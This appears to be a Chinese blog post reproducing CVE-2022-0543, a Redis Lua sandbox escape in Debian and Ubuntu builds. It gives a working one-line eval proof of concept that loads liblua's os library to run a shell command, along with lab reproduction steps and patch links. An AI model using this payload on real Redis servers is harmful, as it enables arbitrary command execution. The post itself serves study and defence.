【CVE-2022-0543】Redis Lua沙盒绕过命令执行复现
2024-10-20 11:34:59
免责声明:
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。
0x00 漏洞简介
Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本1的能力。
Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
参考链接:
- https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
- https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787
影响版本:
- Debian
- Ubuntu
0x01 漏洞POC
eval 'local os_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so", "luaopen_os"); local os = os_l(); os.execute("touch /tmp/redis_poc"); return 0'
注意:根据版本的不同调整 loadlib 的路径。
0x02 漏洞复现
1.使用vulhub2起一个环境
2.使用redis-cli链接Redis
3.执行POC
0x03 修复建议
- Ubuntu:https://ubuntu.com/security/notices/USN-5316-1
- Debian:https://www.debian.org/security/2022/dsa-5081
最新文章
- 页面Button/Link 传参数
- 启动ip转法功能
- mac终端中显示tree的命令
- myBatis实例
- CNAME
- 享元模式(咖啡屋)【java与模式】
- OAuth在WebApi
- AppCan 双击返回按钮退出应用
- PHPCMS-后台管理中心
- JDBC(下)
- C#打开php链接传参然后接收返回值
- 【转】解决memcached启动失败
- linux_sudo命令
- event.target解析
- IdentityServer4-Resource定义-翻译
- 运行和管理Rabbit
- 【转】类似py2exe软件真的能保护python源码吗
- 深入理解.NET MemoryCache
- 优雅地搭建整合ssm项目
- 如何读取抓取的wifi包内容
热门文章
- git reset总结
- 利用京东云Web应用防火墙实现Web入侵防护
- web前端小知识 —— 【HTML,CSS,JS】集锦 【第一期】 { }
- 清源正本,鉴往知来,Go lang1.18入门精炼教程,由白丁入鸿儒,Golang中引用类型是否进行引用传递EP18
- 《Java基础——构造器(构造方法)》
- MinIO管理员完整指南
- 第二章:视图层 - 7:HttpResponse对象
- MySQL集群搭建(3)-MMM高可用架构
- PostgreSQL 选择数据库
- 【原创】推流录屏软件OBS使用教程--录屏